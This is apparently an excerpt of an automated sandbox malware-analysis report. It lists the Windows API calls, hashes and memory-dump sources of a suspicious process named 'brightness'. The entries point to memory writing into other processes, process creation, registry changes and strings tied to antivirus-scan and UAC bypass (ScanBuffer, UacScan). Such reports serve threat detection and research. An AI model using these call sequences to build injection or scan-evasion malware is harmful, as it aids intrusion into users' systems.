                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                            • Opcode ID: b8dae2bc2bb3a2dfd2068a7c7273de4f45ca1369e7183f08373a8c5254b24103
                                                                                                                                            • Instruction ID: 0b7aabe477abeeb5d86c353edc8501a2daccb61bcf56138ec4591a860eb0a3e3
                                                                                                                                            • Opcode Fuzzy Hash: b8dae2bc2bb3a2dfd2068a7c7273de4f45ca1369e7183f08373a8c5254b24103
                                                                                                                                            • Instruction Fuzzy Hash: 7051F175A012408FDB27CF6CD9E8796BBD0AF45314F9881AEE548CB2C6EB70D445CBA1

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 027CE86A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CheckConnectionInternet
                                                                                                                                            • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                            • API String ID: 3847983778-3852638603
                                                                                                                                            • Opcode ID: 8294ad94de7ad5947782b97e203fec1e65b17854d4b98dcdee8297232f0c1a1a
                                                                                                                                            • Instruction ID: 8151cc8c75433ae876b43281ae0d2eb54c218342c6b500a1bce96ad4257b3702
                                                                                                                                            • Opcode Fuzzy Hash: 8294ad94de7ad5947782b97e203fec1e65b17854d4b98dcdee8297232f0c1a1a
                                                                                                                                            • Instruction Fuzzy Hash: 4E41FB75B14109AFEB13EBB4D8A6BDEB7FAEF48710F214439E041A7646DA74AD018F10

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,027C8903), ref: 027C8850
                                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,027C8903), ref: 027C8860
                                                                                                                                            • GetProcAddress.KERNEL32(74AD0000,00000000), ref: 027C8879
                                                                                                                                              • Part of subcall function 027C7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 027C7D6C
                                                                                                                                            • FreeLibrary.KERNEL32(74AD0000,00000000,02812388,Function_000065D8,00000004,02812398,02812388,000186A3,00000040,0281239C,74AD0000,00000000,00000000,00000000,00000000,027C8903), ref: 027C88E3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Library$AddressFreeHandleLoadMemoryModuleProcVirtualWrite
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1543721669-0
                                                                                                                                            • Opcode ID: ba7c0317d505ec8763b404a9c69e9927b717469cc8469c9f33d96a1d60449157
                                                                                                                                            • Instruction ID: 64a6557006d855ff6c8670c9a24835f4bbae8d67dce069baafd6cc0ccef495db
                                                                                                                                            • Opcode Fuzzy Hash: ba7c0317d505ec8763b404a9c69e9927b717469cc8469c9f33d96a1d60449157
                                                                                                                                            • Instruction Fuzzy Hash: 2F11B178A40318ABEB07FBB8DC29B8E77ADEF49700F5104287B14EB2D5CA3499108F15
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027C8088,?,?,00000000,?,027C79FE,ntdll,00000000,00000000,027C7A43,?,?,00000000), ref: 027C8056
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNELBASE(?), ref: 027C806A
                                                                                                                                              • Part of subcall function 027C80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027C8148,?,?,00000000,00000000,?,027C8061,00000000,KernelBASE,00000000,00000000,027C8088), ref: 027C810D
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027C8113
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(?,?), ref: 027C8125
                                                                                                                                            • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 027C8660
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                                                                            • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                                            • API String ID: 3130163322-2353454454
                                                                                                                                            • Opcode ID: d8f6f2ab2f230db18d0dac2354102351158b9396580d60babe23a2101f8e1ed2
                                                                                                                                            • Instruction ID: dbe6b08eb1328ce404d6db82a70916c16846be591b8aa22e6decd555b7f18cc7
                                                                                                                                            • Opcode Fuzzy Hash: d8f6f2ab2f230db18d0dac2354102351158b9396580d60babe23a2101f8e1ed2
                                                                                                                                            • Instruction Fuzzy Hash: 981115B6600248AFDB42EFA8CC55F9B37EDEB0C710F624458FA08E7291C630E9108B61
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027C8088,?,?,00000000,?,027C79FE,ntdll,00000000,00000000,027C7A43,?,?,00000000), ref: 027C8056
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNELBASE(?), ref: 027C806A
                                                                                                                                              • Part of subcall function 027C80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027C8148,?,?,00000000,00000000,?,027C8061,00000000,KernelBASE,00000000,00000000,027C8088), ref: 027C810D
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027C8113
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(?,?), ref: 027C8125
                                                                                                                                            • WinExec.KERNEL32(?,?), ref: 027C8470
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule$AddressProc$Exec
                                                                                                                                            • String ID: Kernel32$WinExec
                                                                                                                                            • API String ID: 2292790416-3609268280
                                                                                                                                            • Opcode ID: c985a2021f86e25618f953fa269871b97f5eac9d00f49b598921652a86facb2c
                                                                                                                                            • Instruction ID: 5d79631fbf7965e4f4b4746ed68599c4faf8f73f8bb9f7f114962cbe7d7fdd36
                                                                                                                                            • Opcode Fuzzy Hash: c985a2021f86e25618f953fa269871b97f5eac9d00f49b598921652a86facb2c
                                                                                                                                            • Instruction Fuzzy Hash: 3601A479640204BFE713EFB4DC29F9A77EDEB48710F618868F900D7690D674AE108B26
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027C8088,?,?,00000000,?,027C79FE,ntdll,00000000,00000000,027C7A43,?,?,00000000), ref: 027C8056
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNELBASE(?), ref: 027C806A
                                                                                                                                              • Part of subcall function 027C80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027C8148,?,?,00000000,00000000,?,027C8061,00000000,KernelBASE,00000000,00000000,027C8088), ref: 027C810D
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027C8113
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(?,?), ref: 027C8125
                                                                                                                                            • WinExec.KERNEL32(?,?), ref: 027C8470
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule$AddressProc$Exec
                                                                                                                                            • String ID: Kernel32$WinExec
                                                                                                                                            • API String ID: 2292790416-3609268280
                                                                                                                                            • Opcode ID: 6c617128039fd365430f38e2cd67f1801a219fab20c90414f366a08d02e2b960
                                                                                                                                            • Instruction ID: 926ccfe111369430d632e0ec56e5cc9cd27be0ff7fb83821eaf8e17e661389dc
                                                                                                                                            • Opcode Fuzzy Hash: 6c617128039fd365430f38e2cd67f1801a219fab20c90414f366a08d02e2b960
                                                                                                                                            • Instruction Fuzzy Hash: 88F0A479640204BFE713EFB4DC29F9A77EDEB48710F618868F900D7690D674AA108B26
                                                                                                                                            APIs
                                                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,027C5CF4,?,?,027C3880,00000001), ref: 027C5C08
                                                                                                                                            • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,027C5CF4,?,?,027C3880,00000001), ref: 027C5C36
                                                                                                                                              • Part of subcall function 027B7D10: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,027C3880,027C5C76,00000000,027C5CF4,?,?,027C3880), ref: 027B7D5E
                                                                                                                                              • Part of subcall function 027B7F18: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,027C3880,027C5C91,00000000,027C5CF4,?,?,027C3880,00000001), ref: 027B7F37
                                                                                                                                            • GetLastError.KERNEL32(00000000,027C5CF4,?,?,027C3880,00000001), ref: 027C5C9B
                                                                                                                                              • Part of subcall function 027BA6F8: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,027BC359,00000000,027BC3B3), ref: 027BA717
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 503785936-0
                                                                                                                                            • Opcode ID: 2e14d54233ac52247734969c7ccc90bcf1c34d654465db823dd26cda58fc219c
                                                                                                                                            • Instruction ID: 436e84cd4ad7b85f3091d259b87662d894a24ab873ec829166510260eb625214
                                                                                                                                            • Opcode Fuzzy Hash: 2e14d54233ac52247734969c7ccc90bcf1c34d654465db823dd26cda58fc219c
                                                                                                                                            • Instruction Fuzzy Hash: 55319370A002099FDB12EFB8C8897DEBBF6AF48314F908469E904B7381D77569458FA5
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyA.ADVAPI32(?,00000000,02906914), ref: 027CEB38
                                                                                                                                            • RegSetValueExA.ADVAPI32(000005DC,00000000,00000000,00000001,00000000,0000001C,00000000,027CEBA3), ref: 027CEB70
                                                                                                                                            • RegCloseKey.ADVAPI32(000005DC,000005DC,00000000,00000000,00000001,00000000,0000001C,00000000,027CEBA3), ref: 027CEB7B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseOpenValue
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 779948276-0
                                                                                                                                            • Opcode ID: d291967a615dc852c958d4d3cd38d1349741acbeb475ba9040e19ddc26c387c5
                                                                                                                                            • Instruction ID: a8266c8e7163d5433932a2546926f463308e8a1a373407f66b493a5bd84c9a65
                                                                                                                                            • Opcode Fuzzy Hash: d291967a615dc852c958d4d3cd38d1349741acbeb475ba9040e19ddc26c387c5
                                                                                                                                            • Instruction Fuzzy Hash: C411F871A04208AFEB02EFA8D8A5EAA7BEDEF09710F600464F515DB651D730DE618A64
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyA.ADVAPI32(?,00000000,02906914), ref: 027CEB38
                                                                                                                                            • RegSetValueExA.ADVAPI32(000005DC,00000000,00000000,00000001,00000000,0000001C,00000000,027CEBA3), ref: 027CEB70
                                                                                                                                            • RegCloseKey.ADVAPI32(000005DC,000005DC,00000000,00000000,00000001,00000000,0000001C,00000000,027CEBA3), ref: 027CEB7B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseOpenValue
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 779948276-0
                                                                                                                                            • Opcode ID: 1ffe7bbfdfecb051aef399134ff054469913a9f17ea86f00770158cb00717723
                                                                                                                                            • Instruction ID: 9664c09b9ced8d7fe2a1e97240bef8bce4da1e149962044259144681bba903ef
                                                                                                                                            • Opcode Fuzzy Hash: 1ffe7bbfdfecb051aef399134ff054469913a9f17ea86f00770158cb00717723
                                                                                                                                            • Instruction Fuzzy Hash: C1110A71A04208AFEB03EFA8D8A5EAE7BEDEF09710F600464F515DB651D730DA618B64
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ClearVariant
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1473721057-0
                                                                                                                                            APIs
                                                                                                                                            • SysFreeString.OLEAUT32(027CED84), ref: 027B4C1A
                                                                                                                                            • SysAllocStringLen.OLEAUT32(?,?), ref: 027B4D07
                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 027B4D19
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: String$Free$Alloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 986138563-0
                                                                                                                                            APIs
                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 027C735A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeString
                                                                                                                                            • String ID: H
                                                                                                                                            • API String ID: 3341692771-2852464175
                                                                                                                                            APIs
                                                                                                                                            • VariantCopy.OLEAUT32(00000000,00000000), ref: 027BE701
                                                                                                                                              • Part of subcall function 027BE2E4: VariantClear.OLEAUT32(?), ref: 027BE2F3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Variant$ClearCopy
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 274517740-0
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitVariant
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1927566239-0
                                                                                                                                            APIs
                                                                                                                                            • CLSIDFromProgID.OLE32(00000000,?,00000000,027C6D39,?,?,?,00000000), ref: 027C6D19
                                                                                                                                              • Part of subcall function 027B4C0C: SysFreeString.OLEAUT32(027CED84), ref: 027B4C1A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeFromProgString
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4225568880-0
                                                                                                                                            APIs
                                                                                                                                            • GetModuleFileNameA.KERNEL32(027B0000,?,00000105), ref: 027B5832
                                                                                                                                              • Part of subcall function 027B5A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,027B0000,027DE790), ref: 027B5A94
                                                                                                                                              • Part of subcall function 027B5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,027B0000,027DE790), ref: 027B5AB2
                                                                                                                                              • Part of subcall function 027B5A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,027B0000,027DE790), ref: 027B5AD0
                                                                                                                                              • Part of subcall function 027B5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 027B5AEE
                                                                                                                                              • Part of subcall function 027B5A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,027B5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 027B5B37
                                                                                                                                              • Part of subcall function 027B5A78: RegQueryValueExA.ADVAPI32(?,027B5CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,027B5B7D,?,80000001), ref: 027B5B55
                                                                                                                                              • Part of subcall function 027B5A78: RegCloseKey.ADVAPI32(?,027B5B84,00000000,?,?,00000000,027B5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 027B5B77
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2796650324-0
                                                                                                                                            APIs
                                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 027B7DA8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileWrite
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3934441357-0
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,?,027D2E7D,ScanString,0281237C,027DB40C,OpenSession,0281237C,027DB40C,ScanBuffer,0281237C,027DB40C,OpenSession,0281237C,027DB40C,Initialize), ref: 027B7E3F
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,?,027CFD00,ScanString,0281237C,027DB40C,OpenSession,0281237C,027DB40C,ScanString,0281237C,027DB40C,UacScan,0281237C,027DB40C,UacInitialize), ref: 027B7E1B
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            APIs
                                                                                                                                            • SysFreeString.OLEAUT32(027CED84), ref: 027B4C1A
                                                                                                                                            • SysReAllocStringLen.OLEAUT32(027DC2B4,027CED84,000000B4), ref: 027B4C62
                                                                                                                                            Similarity
                                                                                                                                            • API ID: String$AllocFree
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 344208780-0
                                                                                                                                            APIs
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeString
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3341692771-0
                                                                                                                                            APIs
                                                                                                                                            • timeSetEvent.WINMM(00002710,00000000,027DBF78,00000000,00000001), ref: 027DBF94
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Eventtime
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2982266575-0
                                                                                                                                            APIs
                                                                                                                                            • SysAllocStringLen.OLEAUT32(00000000,?), ref: 027B4BEB
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocString
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2525500382-0
                                                                                                                                            APIs
                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 027B4C03
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeString
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3341692771-0
                                                                                                                                            APIs
                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,027B1A03,?,027B2000), ref: 027B15E2
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                            • Opcode ID: fb548551c2fdadd22f213b8b1beca4484fc99cd02b61a9b67fe246e72db1588d
                                                                                                                                            • Instruction ID: d1e4e78b2f592716d282d36b84e2a189d4abff01600864c31e6e6dcfb5fd2c57
                                                                                                                                            • Opcode Fuzzy Hash: fb548551c2fdadd22f213b8b1beca4484fc99cd02b61a9b67fe246e72db1588d
                                                                                                                                            • Instruction Fuzzy Hash: 65F037F4B413408FDB96CF7999943427AD2EB89348F60C679E709DB6C8EB71A4018B11
                                                                                                                                            APIs
                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,027B2000), ref: 027B16A4
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                            • Opcode ID: 6a83d2f535ad255c770d584a2250a8ee72c096628af8242fa3b4957a2000a4bd
                                                                                                                                            • Instruction ID: bd9b38015240adeeefd4ea77138002fd2aa1960871bfde4ed2d5bc22c77c5d45
                                                                                                                                            • Opcode Fuzzy Hash: 6a83d2f535ad255c770d584a2250a8ee72c096628af8242fa3b4957a2000a4bd
                                                                                                                                            • Instruction Fuzzy Hash: EAF024B6F007946BD7128F5AAC84783BBA8FF00314F040539FA0C97384CB70A8108B94
                                                                                                                                            APIs
                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,027B1FE4), ref: 027B1704
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1263568516-0
